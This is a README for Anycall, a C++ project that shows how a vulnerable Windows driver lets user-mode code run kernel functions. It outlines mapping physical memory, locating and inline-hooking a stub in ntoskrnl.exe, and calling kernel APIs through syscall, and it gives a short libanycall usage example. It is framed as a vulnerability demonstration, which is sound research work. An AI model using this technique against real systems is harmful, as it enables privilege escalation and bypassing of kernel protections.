Anycall
x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration
The project is written primarily in C++, distributed under the MIT License, first published in 2021. Key topics include: cli, code-execution, device-driver, driver, drivers.
Read: https://www.godeye.club/2021/05/14/001-x64-windows-kernel-code-execution-via-user.html
How it works
- Allocate physical memory to user virtual memory
- Allows a user process to manipulate arbitrary physical memory without calling APIs
- Search the entire physical memory until we find a function stub to hook in the physical memory of `ntoskrnl.exe`
- Once the stub is found, place an inline hook on the stub: simply `jmp rax`, where the detour address could be anything we want to invoke
- Simply `syscall` it: wow, we are in user mode but able to call kernel APIs
Goal of this project
This project demonstrates how drivers that allow a user process to map physical memory into its own address space work, and why that capability is a critical vulnerability.
Related CVEs:
libanycall
libanycall is a C++ static library that makes executing the anycall exploit easier.
Usage
- link it (e.g., `#pragma comment( lib, "libanycall64" )`)
- include it (e.g., `#include "libanycall.h"`)
For example:
```cpp
#include <windows.h>
#include <cstdio>
#include <cstdint>
#include <cstdlib>
#include "libanycall.h"
#pragma comment( lib, "libanycall64" )

// function-pointer type matching the kernel export we want to invoke
using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );

int main( const int argc, const char** argv, const char** envp )
{
    // locate the syscall stub (here NtTraceControl in ntdll.dll) used as the hook target
    if ( !libanycall::init( "ntdll.dll", "NtTraceControl" ) )
    {
        printf( "[!] failed to init libanycall\n" );
        return EXIT_FAILURE;
    }

    // invoke NT kernel APIs from usermode
    const uint32_t process_id = ( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );
    printf( "PsGetCurrentProcessId returns %u\n", process_id );

    return EXIT_SUCCESS;
}
```
License
MIT